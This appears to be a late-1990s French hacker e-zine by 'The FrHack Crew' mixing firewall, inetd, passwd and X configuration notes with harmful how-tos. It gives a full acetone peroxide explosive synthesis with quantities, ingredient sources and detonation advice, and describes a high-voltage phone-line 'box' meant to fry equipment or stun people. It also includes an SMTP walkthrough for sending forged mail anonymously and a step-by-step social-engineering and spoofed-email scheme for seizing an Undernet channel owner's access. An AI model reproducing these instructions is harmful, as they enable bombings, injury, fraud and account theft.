Bon comme vous allez ˆtre un Proxy , il va falloir forcement d‚sactiver la fonction de routeur de Linux . Pour cela on recompile le noyau en r‚pondant NO au forwarding/gatewaying (CONFIG_IP_FORWARDING) . Vous ˆtes pas oblig‚ de mettre cette option mais si vous ne le faites pas les machines du r‚seau interne seraient directement accessibles de l'ext‚rieur … travers les possibilit‚s du FW .
Si l'IP forwarding est laisse , alors la il y a une faille mais la je connais pas du tout ,en fait la solution serait de downer le firewall , ainsi le FW ne marcherait plus mais le noyau lui continuerait a router les paquets sans suivre les rŠgles! Pour ‡a , il y a des solutions diverses et pas trŠs gentilles comme le SYN flooding et autres attaques barbares .

Bon vous compilez les outils TIS en suivant les instructions .

Configuration

La table netperm r‚side dans le fichier /usr/local/etc/netprem-table . Cette table d‚crit la configuration principale de tous les composants du Trusted Firewall Toolkit . Quand une des applications est lanc‚e elle va chercher sa config dans cette table

Description

-Netacl: Cette application permet de donner l'accŠs aux diff‚rents services TCP . Ce programme se d‚marre depuis le super-d‚mon inetd .
Si par exemple on ajoute au fichier /etc/inetd.conf
telnet stream tcp nowait root /usr/local/etc/netacl telnetd
Avec ca quand une requˆte atteint le port ftp du systŠme netacl se d‚marre avec comme paramŠtre telnetd . Mais avant que le d‚mon soit lance le logiciel v‚rifie que la requˆte est valide selon la table . Par exemple si je veux autorise aux personnes de mon r‚seau interne de se connecter au telnet du FW faudra ajouter:
netacl-telnetd: permit-hosts 193.1.1.* -exec /usr/sbin/in.telnetd
(note 193.1.1.* ‚quivaut … 193.1.1.0/24)

AprŠs on a aussi tous les logiciels qui implementent un relais pour les services .
En fait le client fait d'abord une requˆte au service du FW puis de la fait une requˆte pour se connecter au site ext‚rieur . Selon les rŠgles du proxy cette connexion sera refus‚e ou accept‚e .
-tn-gw: relais pour le service telnet .
-ftp-gw: relais pour le service ftp .
-rlogin-gw: relais pour le proxy rlogin .
-http-gw: relais pour client HTTP et gopher .( pratique pour empˆcher certaines applications JAVA )
....
Il y en a d'autres mais je les connais pas tous donc pour plus de renseignement allez voir vous mˆme!

exemple de config de /usr/local/etc/netperm-table:
tn-gw: deny-hosts * -dest 193.1.1.*
Interdiction a ces machines d'acc‚der au service telnet .
tn-gw: permit-hosts 193.1.1.25
autorise la machine 193.1.1.25 a acc‚der au service telnet .

Pas compliqu‚ et je vous jure que c'est incroyable tout ce que l'on peut faire et les espŠces de security hole que ca peut faire.

The FrHack Crew
Snowcrach
Bas‚ sur le livre de Linux


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Peroxyde d'acetone

Le peroxyde d'ac‚tone est un explosif trŠs puissant. J'estime environ ca
puissance … 10 fois sup‚rieur a celle de la poudre noir (Poudre … canon).
Dans le texte qui va suivre, je vais vous expliquer comment en produire. Vous
allez etre ‚tonner mais ce n'est pas vraiment compliquer, mais faut savoir
comme s'y prendre.

Mat‚riaux

1 bouteille de 2 litres de liqueur vide (avec bouchon)
1 Sac a poubelle noir trŠs foncer (Pour mettre la bouteille dedans)
1 bain, ou un grand lavabo (L'eau qui va avec bien entendu)
1 Filtre a caf‚ (ou 2)
1 sac blanc
1 vielle passoire

Jusqu'ici les composantes sont pas trŠs difficile a trouver, c'est maintenant
que cela ce complique un peu.

500 ml d'acetone pur
On trouve l'acetone … la Quincaillerie du coin, dans la section
dilluant a peinture.

450 ml de Peroxyde 30%
On trouve le peroxyde 30% dans quelques pharmacies ,dans la section
teinture pour cheveux, ou dans un centre de coiffure. Bien important
faut pas que le peroxyde soit en crŠme comme a quelques endroits qui
en vendent, mais bien un liquide transparant comme de eau.

20 ml d'acide muriatique 20% (HCL)
On retrouve l'acide muriatique … la quincaillerie du coin, dans la
section piscine, ou dans un centre de la piscine.
ATTEMTION: Ce produit est tres dangereux, ne le respirer pas et
essayer de pas entrer en contact avec celui-ci.


Proc‚dures


Tout ce qui va suivre ne doit pas etre fais dans une maison. Apres avoir v‚cu
l'exp‚rience, j'Ai d‚cider de faire ca dans un garage bien a‚rer, ou meme
dehors. Sinon vous risquer de brailler durant une coupe d'heure par rapport
a vos yeux qui br–le et de la difficult‚ a respirer.

Vous versez le 500 ml d'Acetone dans la bouteille 2 litre, au soin prener un
entenoir. Ensuite vous verser le 450 ml de Peroxyde de la meme maniŠre dans
la bouteille. La pour ceux qui sont pas vite vite, vous etes rendu avec une
solution de 950 ml. C'est maintenant que cela vient un peu plus dangereux.
Verser directement dans la bouteille les 20 ml Acide muriatique, mais pas
avec le meme entenoir que pr‚c‚dament, ou laver le bien et essuyer le bien.
Sinon une petite r‚action chimique va se produire. Ensuite agiter un peu.
ATTENTION: Attender avant de mettre le bouchon.

Quand vous allez verser l'Acide muriatique, une petite r‚action chimique va
se produire. C'est normal que cela fasse de petite bulle au dessus de la
solution avec des vapeurs et que le fond de la bouteille soit un peu chaud. Cela devrais durer au maximum 25 min. Apres 25 min tout devrais etre rentrer
dans l'ordre.

ATTENTION:
Si le fond de la bouteille est encore chaud apres 25 minutes
ou qui a encore des vapeurs, jeter votre solution. Vous avez rater l'exp‚-
rience. Moi je dois vous avour que sur environ 20 fois, cela met arriver
seulement une fois. Je ne peux expliquer la cause.

Ensuite viser le bouchon.

Maintenant vous avez le principal de fait. Ensuite faite couler de l'eau
dans votre bain (Lavabo) (Juste de l'eau froide, environ … 4 celcius) Pour que la bouteille soit recouverte completement. D‚poser la bouteille dans le sac noir,et ensuite d‚poser le sac noir (Contenant la bouteille) dans l'eau.
Assurer vous que la bouteille est recouverte du sac noir partout, et que le
sac est completement dans l'eau.


La il faut patienter 2 jours, en laissant le tout comme ca. Apres deux
jours, ou plus, Vous sorter la bouteille, et vous aller voir une petite
poudre blanche dans le fond. Cette poudre est le peroxyde d'Ac‚tone. Main-
tenant vous devez la filtrer. Prener un filtre a caf‚ et une vielle passoir.
D‚poser le filtre dans la passoir, au besoin vous pouvez mettre 2 filtres.
Vider votre solution dans ce filtre au dessus d'un ‚vier ou au dessus
d'un plat. Jeter la solution qui reste.

La maintenant il ne vous reste plus qu'a faire secher la poudre. Prener un
sac en plastique blanc, si le sac est de couleur votre poudre va prendre la
couleur. Bien important que ca soit du plastique. Ensuite laisser s‚cher
durant 2 jours a l'air. Pas dehors sinon vous risquer de perdre votre pou-
dre avec le vent. Ni dans votre maison a cause des vapeurs. Faire secher
dans un garage ou autres. Attention faut pas qui n'est aucune chaleur. PAs
au gros soleil, ni pres d'une lumiere. Apres 1 journer la poudre peut
vous sembler seche, mais erreur, elle reste humide pareille un peu. Et si
vous la stocker, vous risquer de la retrouver tres tres humide apres
quelques jours. LAisser s‚cher au moins 2 jours minimum. Et voila vous avez
du peroxyde d'Ac‚tone.

Faite pas sauter tout votre poudre d'un coup, essayer une petite dose avant.
1 gramme, et vous aller etre tres surpris. Si la poudre est comprimer une
d‚tonation se produit, sinon vous aler avoir un champignon de feu.
Cette poudre est tres explosive, si elle est bien faire, une grosse pierre
lancer sur celle ci devrais d‚clancher une explosion. La je vous averti,
cette poudre est tres tres puissante, c'est pouquoi faite attention. Je vous
conseille pas d'Allumer celle si avec une meche, mais plutot avec un d‚tonateur.

The FrHack Crew
_Franck


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Trojan

Bon... pour le zine de frhack j'ai d‚cid‚ de vous parler un peu des trojans. Oui... ces petits programmes lames qui servent seulement a causer de la merde. Je vais vous expliquer comment c'est fait, comment ca agit, d‚pendemment des types, puis comment s'en d‚barasser ‚videmment. Je ne vous expliquerai pas comment s'en servir, parce que c'est tellement simple, et surtout tellement STUPIDE que mon frŠre de 8 ans pourrait devenir un SUPER DUPER HACKER avec cette merde la.

Socket de troie (par JCzic)

Le premier trojan a ˆtre connu, c'est en meme temps un des plus dangeureux. C'est seulement un petit Serv-U (un serveur FTP) cach‚ dans un fichier.. puis qui est lanc‚ au d‚marrage de votre ordinateur. Ca donne le contr“le total de votre ordinateur. Une petite interface graphique trŠs simple pour le client, et le tour est jou‚, n'importe quel enfant peur d‚truire votre HD. Le problŠme est facile a d‚tecter, il y a une petite fenetre qui s'ouvre et qui dit... "un fichier .DLL requis, Setup32.dll, n'a pas ‚t‚ trouv‚" , ISAPI32.DLL pour la deuxiŠme version... puis il y a la troisiŠme. La troisiŠme version est vraiment une catastrophe.. un virus de la pire espŠce. Celui la, tu le caches dans n'importe quel fichier, pis ca agit comme un vrai virus... souvent tu dois r‚installer winblows meme... tk .. lame.

Back Orifice (par le Cult of the Dead Cow)

Un peu diff‚rent comme concept... c'est plutot un programme qui pourrait servir a un admin de r‚seau. Il est encore plus dangeureux que le socket de troie... pourquoi? parce qu'il permet l'accŠs a des ressources que meme vous n'avez pas acces... les dll par exemple. Quand vous ˆtes infect‚s... c'est parce que vous aurez ouvert un ptit fichier sans icone (ca c'est stupide d‚ja en partant) et qu'il y a une petite fenetre M$DOS qui va ˆtre apparue. L'interface du controle est un petit peu moin simple... alors disons qu'un enfant de ... 10 ans pourrait s'en servir... c'est bon quand meme une ‚volution de 2 ans.

NetBus et les autres

Ceux la sont un petit peu moin connus... si tu regardes NetBus.. il est pas trŠs dangeureux. C'est plus pour s'amuser... prendre des screenshots... entk c‚ poche quand mˆme. Je vous dirais que de toutes facons, n'importe quel trojan est vraiment la chose la plus conne, meme si c'est consid‚r‚ comme du hack. Pour ceux qui savent moindrement ce que c'est que le hack, vous vous rendrez compte que
trojan != hack .. de toutes facons.. si vous ˆtes un enfant de 10 ans vous allez pouvoir devenir un mega hacker!!!! aprŠs cet article si jamais ya encore quelqu'un qui pause des question sur les trojans jva lui en servir un sur un plat pour qu'il goute a sa propre m‚decine.

The FrHack Crew
Bismuth


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Port Linux

-=-=-=-=-=-=-=Allow / Deny =-=-=-=-=-=-=-=-
Pratique si vous avez un shell ou une box et que
vous ne voulez pas vous faire hacker par telnet (23).

C`est tellement simple,
1.Vous allez dans /etc (C`est la qu`il y a la plupars des configurations)
2.Tappez pico inetd.conf et vous verrez quelque chose comme ceci,

_______________________________________________________________________________________________|
#
# inetd.conf This file describes the services that will be available
# through the INETD TCP/IP super server. To re-configure
# the running INETD process, edit this file, then send the
# INETD process a SIGHUP signal.
#
# Version: @(#)/etc/inetd.conf 3.10 05/27/93
#
# Authors: Original taken from BSD UNIX 4.3/TAHOE.
# Fred N. van Kempen, <waltje@uwalt.nl.mugnet.org>
#
# Modified for Debian Linux by Ian A. Murdock <imurdock@shell.portal.com>
#
# Modified for RHS Linux by Marc Ewing <marc@redhat.com>
#
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
#
# Echo, discard, daytime, and chargen are used primarily for testing.
#
# To re-read this file after changes, just do a 'killall -HUP inetd'
#
#echo stream tcp nowait root internal
#echo dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
#daytime dgram udp wait root internal
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
#
# These are standard services.
#
#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn

# do not uncomment smtp unless you *really* know what you are doing.
# smtp is handled by the sendmail daemon now, not smtpd. It does NOT
# run from here, it is started at boot time from /etc/rc.d/rc#.d.
#smtp stream tcp nowait root /usr/bin/smtpd smtpd
#nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd
#
# Shell, login, exec and talk are BSD protocols.
#
shell stream tcp nowait root /usr/sbin/tcpd in.rshd
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
talk dgram udp wait root /usr/sbin/tcpd in.talkd
ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd
#dtalk stream tcp waut nobody /usr/sbin/tcpd in.dtalkd
#
# Pop and imap mail services et al
#
pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
imap stream tcp nowait root /usr/sbin/tcpd imapd
#
# The Internet UUCP service.
#
#uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l
#
# Tftp service is provided primarily for booting. Most sites
# run this only on machines acting as "boot servers." Do not uncomment
# this unless you *need* it.
#
#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd
#bootps dgram udp wait root /usr/sbin/tcpd bootpd
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
# cfinger is for GNU finger, which is currently not in use in RHS Linux
#
finger stream tcp nowait root /usr/sbin/tcpd in.fingerd
#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd
#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx
#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
#
# Time service is used for clock syncronization.
#
time stream tcp nowait nobody /usr/sbin/tcpd in.timed
time dgram udp wait nobody /usr/sbin/tcpd in.timed
#
# Authentication
#
auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o
#
# End of inetd.conf

linuxconf stream tcp wait root /bin/linuxconf linuxconf --http
------------------------------------------------------------------------------------------------|

-===Tout les ports avec un # sont ferm‚ exemple:#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a (le port ftp/shell est ferm‚)
----------->Pour l`ouvrir ta rienque a enlever le # .

NE JAMAIS FERMER LE PORT "auth"
Apres tu fais save... (Si tu veux faire des shells account tu dois l`aiss‚ ton port telnet et ftp ouvert.)

Apres tu fais pico hosts.allow

Tu devrais voir quelque chose comme ceci:
________________________________________________________________________________________________|
#
# hosts.allow This file describes the names of the hosts which are
# allowed to use the local INET services, as decided
# by the '/usr/sbin/tcpd' server.
#
in.telnetd: .loginnovation.com, 206.167.170., .videotron.net, .ivic.qc.ca, 206.231.210., .concepta.com
in.telnetd: .videotron.net, 207.96.178., .refract.ctron.net, .total.net, .enter-net.com, 206.167.49.
in.ftpd: .loginnovation.com, 206.167.170., .videotron.net, .ivic.qc.ca, 206.231.210., .concepta.com
in.ftpd: .videotron.net, 207.96.178., .refract.ctron.net, total.net, .enter-net.com, 206.167.49.
in.telnetd: .quebectel.com, 142.169.181.
in.ftpd: .quebectel.com, 142.169.181.
_________________________________________________________________________________________________|

Tu met les adresses de ceux qui ont des shells seulement,exemple:Tu fais un shell a quelqun sur videotron alors tu mettra
.videotron.net, dans la liste.. si il est seul a avoir le shell laisse le seul dans la liste.Ceci empechera quelqun dun
autre providers de lui voler son pass etc...
Il pourra rentrer si il utilise un telnet spoof....

The FrHack Crew
Khanabyss


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Server SMTP

Je vais vous parler de l'envoie d'un mail par les serveurs SMTP.
Rien qu'avoir ca vous devez vous dire ca sert … rien.... car y'a les programmes pour ca.
Mais vous vous trompez c'est super pratique car vous pouvez envoyez un mail de fred … jerome sans que fred sache que vous envoyez ce mail a jerome et donc vous envoyez votre mail d'un maniere totalment anomyne... Et en ^plus vous aurez la joie d'avoir realiser ca vous meme et pas simplement aoie tapez l'emeteeur le recepteur le texte et d'avoir cliker sur send tout ca sur un logi fait par un ducon de progamateur anglophones.....
Il peut y avoir quand meme un risque de se faire tracer donc si vous avez un IP fixe GARE A VOUS en revanche si vous avez un IP non fixe alors c'est deja moins risquez mais mefiez vous quand meme car on c'est jamais et surtout pour le serveur SMTP que vous choisirez NE PRENEZ PAS CELUI DE VOTRE PROVIDER car si vous etes tracer vous serez tres vite gaulez....

Bon on se met au travail :
--------------------------
*materiel :
un ordinateur avec telnet (donc Win 95 / 98 et voire meme win 3.11 mais bon...)
un serveur SMTP valide (bon je vais poas vous insultez en vous expliquant comment en trouver un car si t'es pas un newbies ? Non ? et si oui tanpis ;)
des doigts ou des orteils a default mais c'est plus dur pour tapez car sur ces serveurs les BACKSPACE ne sont pas pris en compte donc faut pas faire de faultes......
un cerveau et de la bonne volonte...

*ALLEZ au travail:
vous avez donc vot serveur valide et vous y acceder par telnet
Choisisez un serveur qui au lancement affiche 220 plutot qu'un seveur qui vous affiche un putain de merde de grand barratin qui sert a rien....

Voici un tit exemple :
220 bill.gates.net SendMail X-320 Io v40.5 Ready at Wed, 18 Nov 1998 02:20:53 E
* HELO bill.gates.net
250 bill.gates.net Hello mon.domaine.com (mon.domaine.com), pleased to meet you
* MAIL FROM:<bill@microsoft.net>
250 <bill@microsoft.net>...Sender Ok!
* RCPT TO:<linux@power.net>
250 <linux@power.net>...Recipient Ok!
* DATA
354 Please enter your message body, ending with a "." on a line by itself
* Alut ! toa ca feel moa ca feel
* bon je vais te leaisser c'est pu koi te dire
* au fait je te retourne
* .
250 Mail Ok!
* QUIT

Bon au cas ou t'as poas compris mais si t'as poas cmpris on va tout mettre au clair
les * sont au commencement des lignes tapez par l'utilisateur et donc FAUT POAS LES TAPER...
Et bon j'ai vraiment rien de mieux a foutre je vous resume les commandes ...
Putain je m'etonne tellemtn que je suis bon... ou meme con ...
Eh si tu pense que suis con vient me le dire en face ;)
Bon alors v'la tes commandes :

HELO bill.gates.net : c'est un truc essentiel c'est le nom du domaine donc ...
MAIL FROM:<(behn la je crois que tu comprend ce qui faut marque)>
RCPT TO:<(behn la aussi c'est la poire que tu maile...)>
DATA : c'est pour commence a entrer le texte de ton mail...
. : c'est pour finir ton mail
HELP : c'est si t'as besoin d'aide
QUIT : je comprend poas a qoui ca sert...

The FrHack Crew
Langly


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Slogan

/msg #hack.fr Bon tlm, dite dequoi d'intelligente qui va paraitre dans le Emag.
<PsYkAoS> You must follow the Goodway
<oktober> uh..
/msg #hack.fr Tu peux faire mieux oktober.. :)
<oktober> "Follow The Leader"
<oktober> Mieux vaut ˆtre dur de la feuille que mou de la branche!
<oktober> Des erreurs de jeunesse, c'est si vite arriv‚.
<_Franck> Souhaitons que lui meurt pas en sortant!!
<oktober> Bah, ‡a risque pas d'arriver!
<oktober> FOLLOW THE LEADER!
<Snowcrach> Le gourvernement as ‚t‚ invent‚ pour nous crosser
<Snowcrach> Les compagnies tels FT ont ‚t‚ invent‚ pour nous crosser
<Snowcrach> Le hacking as ‚t‚ invent‚ pour nous lib‚rer
<Snowcrach> Amen :)
<NuClEaR> ces le 2e zine en 1 ans!!! donc l'autres est pour l'ans prochain
<[ewoks]> j ai une t‚horie paradoxale que j ai inventer qui me plait bien "tous est relatif sauf la bouffe" mais ses stupide pi s am arrive de dire sa quandje suis sur mon trippe bouffe s afeque
<[ewoks]> je ne crois pas en se que vous dite mais je serais pret a me battre pour que vous puissez le dire -=Voltaire=-
<Cub1c> Mourrir n'est pas bon pour la sant‚ - Sant‚ Canada


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

WeaponX boxe

C'est box marche a base d'‚nergie static ,et cette ‚nergie peut cr‚er beaucoup de volts
et peu d'amp‚rage (Juste assez pour faire fondre un modem ou assomer lit‚ralement
quelqu'un).

Pour la construire vous aurez besoin de faire:

-D‚connecter tous les t‚l‚phones de votre ligne , ou tout autre objets qui utilise la ligne
t‚l‚phonique(r‚pondeur,boite vocale,modem,etc).

-D‚pluger toutes t‚l‚visions,radio ou autre pour ‚viter le danger.

-Vous aurez besoin d'un g‚n‚rateurs d'‚nergie static.

-Connecter une balle de cuivre au fils rouge et une barre de m‚tal au fils vert.

-Mettez quelque chose pour vous prot‚ger les mains(mat‚riaux non conducteurs) come des gants
de vaiselles en ROBER

-Meter votre g‚n‚rateur … au moins 10 000 volts

-Metter votre boulle de cuivre coller sur le G‚n‚rateur d'‚lectricit‚ static.Tener la barre de Fer
dans votre autre main et garder la loin de votre G‚n‚rateur(au moins deux pieds de l'autre sens).

-Composer le num‚ro

-Metter la bar de fer au dessus du G‚n‚rateur il vas y avoir des petites ‚clairs n'ayez pas peur.

-AprŠs quelque secondes une grosse ‚clair va aparaitre du G‚n‚rateur a la bar de fer.Tener bien la bar
et ne la bouger pas.

-Le t‚l‚phone va faire un bruit bizarre et ensuite peut-ˆtre que votre prise de courant va fondre,mais
Le r‚sultat va ˆtre trŠs bons.

Voici un plan de ce que ca devrait ressembler

------------------
| 1 2 3 |
| |
| 4 5 6 |
| |
| 7 8 9 |
| |
| # 0 * |
------------------
| |
Boule de cuivre | |
_ | | Bar de Fer
(_)-----| |---------------------
| |
Fils rouge------->| |
| |>-----fils vert
G‚n‚rateur | |
-------- | |
| | | |
| | | |
| | | |
-------- | |
D'‚nergie static | |
-----------------------------------------------
Plogue dans le mur

The FrHack Crew
Snowcrach


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Password Linux


Un des fichiers les plus important sur un systŠme linux (et un des plus int‚ressant pour la plupart d'entre nous :) ) est le fichier passwd. J'ai donc d‚cid‚ de vous offrir une petite introduction … ce fichier.

D'abord, la structure :

Chaque ligne repr‚sente un utilisateur, un deamon ou un service du systŠme... Chaque ligne est s‚par‚e en parties par des " : " qui repr‚sentent chacun un segment d'information sur les accŠs et droits de l'utilisateur.

Ex : root:x:0:0::/root:/bin/bash

- La premiŠre partie de la ligne repr‚sente le nom de l'utilsateur.
- La deuxiŠme repr‚sente le mot de passe de l'utilisateur (il est encod‚). Si un X ou un * se trouve … cette place, c'est parce que les mots de passe se retrouve dans un autre fichier appel‚ fichier shadow, cette mesure sert de double s‚curit‚ car si quelqu'un r‚ussi … se procurer le passwd file, il devra aussi avoir le shadow pour pouvoir d‚crypter les passwords.
- Le troisiŠme champ est l'UID, le User ID qui sert a identifier l'utilisateur par un num‚ro pour le systŠme d'exploitation.
- La quatriŠme position est le GID, le Group ID qui identifie le # du groupe auquel appartient cet utilisateur.
- En cinquiŠme position vient le champ de commentaire qui peut servir … mettre le vrai nom d'un utilisateur ou d'autres infos.
- La position suivante est le r‚pertoire home de l'utilisateur, le r‚pertoire ou il se retrouve lorsqu'il se log sur le system.
- En dernier, nous retrouvons la premiŠre commande ex‚cut‚e lorsque l'utilisateur se log, il s'agit habituellement d'un interpr‚teur de commande qui permettra … ce mˆme utilisateur d'entrer certaines commande pour interagir avec l'OS.

Exemple de fichier passwd complet : (ce fichier se trouve dans /etc/passwd)

operator:x:11:0:operator:/root:/bin/bash
root:x:0:0::/root:/bin/bash
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
sync:x:5:0:sync:/sbin:/bin/sync
bin:x:1:1:bin:/bin:
ftp:x:404:1::/home/ftp:/bin/bash
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
mail:x:8:12:mail:/var/spool/mail:
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
man:x:13:15:man:/usr/man:
guest:x:405:100:guest:/dev/null:/dev/null
nobody:x:65534:100:nobody:/dev/null:
daft:x:1000:100:,,,:/home/daft:/bin/bash


Son utilit‚ :

Le fichier permet entre autres de r‚cup‚rer le mot de passe d'un systŠme si ce dernier ne les a pas mis en shadow. Il permet aussi d'enlever un utilisateur du systŠme en effacant la ligne qui lui correspond dans le fichier.
NOTE : Ne tentez jamais de modifier le champ du mot de pass en le changeant directement dans le fichier passwd (h‚h‚h‚h, bin vous pouvez essayer, mais je garantis pas la validit‚ du passwd que vous allez avoir entr‚!)

S‚curit‚s possibles :

Il y a diff‚rent systŠmes qui enlŠvent le champ du passwd pour le remplacer en x ou * pour des raisons de s‚curit‚.
Il y a d'abord le systŠme des shadowed passwd files qui enlŠvera tous les passwd du fichier passwd pour les mettre dans le fichier " shadow ".
Ensuite, il y a le NIS (network information system) qui lui utilise une banque centralis‚e d'information sur les utilisateurs et leurs mots de passe (trŠs rare).
Finalement, il y a les Yellow Pages qui n'utilisent pas le champ r‚serv‚ au mot de passe dans passwd et qui fonctionne … la maniŠre de NIS.

Il y a naturellement d'autres systŠmes mais ceux-ci sont les plus courants.

The FrHack Crew
Oktober


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Coment resetter le password du op 500 sur undernet


Il y a plusieur m‚tode. Ca devrait marcher facilement sur les petit channel
car vous devez avoir un access 450 et + .

Methode Facile

Vous ˆtes sur un nouveau channel et il y a un X ou W . Essayer de faire du SE
pour avoir un access 499. Lorsque vous avez votres access, faites en un autres avec
un nick quasiment pareille au 500 . Exemple: Admetons que le 500 c'est FILA667,
tu fais un access a FILA667, et le reste doit se faire par e-mail . Vous devez prendre
le e-mail du 500 . Trouver un mailleur annonyme ou utiliser la thecnique du server SMTP
comme expliqu‚ ci-dessus et c'est partit. Comme adresse de l'expediteur ecrivez celle
du 500 (adresse a envoyer ces w@undernet.org ou x@undernet.org
dependament si c'est X ou W dans le channel). Bon voici le formulaire, copier coller le dans
le e-mail et inscriver-y ceci:


-----------------------------------

S'il vous plait, inscrivez un "X" a l'endroit approprie:

1) __ Correction de Mask

2) __ Ajouter un(des) nouveau(x) user@host(s)

3) __ Nouveau fournisseur internet; mon user@host dois etre change


4) __ Autre
Description:



S'il vous plait, fournir les informations

  
suivantes:

Canal:

Bot (X/W):

Votre Nickname:

User@host actuel:

Nouveau user@host:

Voulez-vous le(s) nouveau(x) Mask(s)
ajoute(s) a X/W comme vous l'avez demandez? (Oui/Non):

Si oui, a quel(s) niveau(x) d'acces, et sous quel(s) Nickname(s)?
Ancienne adresse e-mail:
Nouvelle adresse e-mail:
(Si necessaire)

_______________________________


Bon voici ce que vous ecrivez:
Dison que je veux le faire au canal #quebec
et que le 500 est DragGuard et que mon host est *!*@*.cite.net et mon e-mail est
bill@microsoft.com , voici ce que j'ecrit:

· la premiŠre question je coche :
2 (ajout d'un news user host)

apres dans canal j'ecrit:
#quebec

apres dans bot:
x

dans votres nick ces:
Draguard (avec juste un g pour le faker)

dans user host actuel:
undernet@step.polymtl.ca

apres ca dans nouvelle host:
undernet@*.cite.net

Voulez-vous le(s) nouveau(x) Mask(s)
ajoute(s) a X/W comme vous l'avez demandez? (Oui/Non): tu ecris: OUI

Si oui, a quel(s) niveau(x) d'acces, et sous quel(s) Nickname(s)?
access 500 nick: draguard

Ancienne adresse e-mail:
%?$%%@?%$?%?.com (tu ecrit l'adresse du 500)

Nouvelle adresse e-mail: bill@webmaster.com (tu ecris ton vrai e-mail)
(Si necessaire)


Une fois terminer, vous incluer:

P.S mon access sur mon ancien provideur fini aujourd'hui, veuiller envoyer
le courier … bill@microsoft.com


Envoyer le message.

AprŠs quelques temps vous aurez un retour de mail vous indiquand si la demande as ‚t‚ accepter. Si oui , le e-mail inclura un password temporaire. Servez-vous en bien.

The FrHack Crew
NuClEaR

-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Configuration de la souris sous X

La souris

Xfree86 utilise beaucoup la souris. Vous devez donc indiquer le type de la v“tre et comment elle est connect‚e au systŠme. XFree86 reconnaŒt la majorit‚ des souris usuelles et un type qui ne serait pas support‚ directement peut souvent simuler une souris plus courante. Dans le fichier de configuration, la section concernant … la souris se nomme Pointer (pour un p‚riph‚rique de d‚signation ou de pointage), et ressemble … ceci :

Section " Pointer "

Protocol " Microsoft "
Device " /dev/mouse "

# Si vous utilisez XQUEUE, commentez les deux lignes pr‚c‚dentes et uncommentez la suivante

# Protocol " Xqueue "

# Baud rate et Samplerate ne concerne que quelques souris Logitech

# BaudRate 9600
# SampleRate 150

# Emulate3Buttons est une option pour les souris Microsoft … deux boutons

# Emulate3Buttons

# ChordMiddle est une option pour certains souris Logitech … trois boutons

# ChordMiddle

EndSection

La clause Protocol d‚signe la souris ou l'‚mulation … utiliser. La page de manuel de Xconfig ou XF86Config indique la liste des types de souris reconnus. Si vous avez une souris d' un autre fournisseur que Microsoft ou Logitech, lisez cette page de manuel, ou toute autre documentation … votre disposition, afin de d‚terminer le protocole … utiliser. Une autre m‚thode pour d‚terminer le type de la souris consiste … observer les messages affich‚s au d‚marrage de linux - il identifie souvent la souris. Les souris Microsoft utilisent toujours le protocol Microsoft. Beaucoup de souris Logitech sont compatibles avec Microsoft, mais les plus r‚centes utilisent le protocol Mouseman. Les souris Dexxa (et celles de nombreux autres fabriquants) ‚mulant une souris Microsoft, vous pouvez utiliser ce protocol avec celles ci...

La clause Device d‚finit le port auquel la souris est attach‚e, … l'aide de la terminologie Linux. Dans la majorit‚ des cas, il suffit d'indiquer /dev/mouse, la proc‚dure d'installation de Linux ayant d‚j… configur‚ la souris. Si vous utilisez une souris sur le port PS/2 d'un IBM PS/2, utilisez le pilote de p‚riph‚rique PS/2 et non pas un pilote de port s‚rie. Les pages de manuel et la documentation de Xfree86 indiquent les pilotes de p‚riph‚riques valides, mais la plupart des versions reconnaissent le suivants :

/dev/mouse
Pilote de souris par d‚faut
/dev/inportbm
Souris Microsoft uniquement (bus microsoft)
/dev/logibm
Souris Logitech uniquement (bus logitech)
/dev/psaux
Souris sur le port PS/2


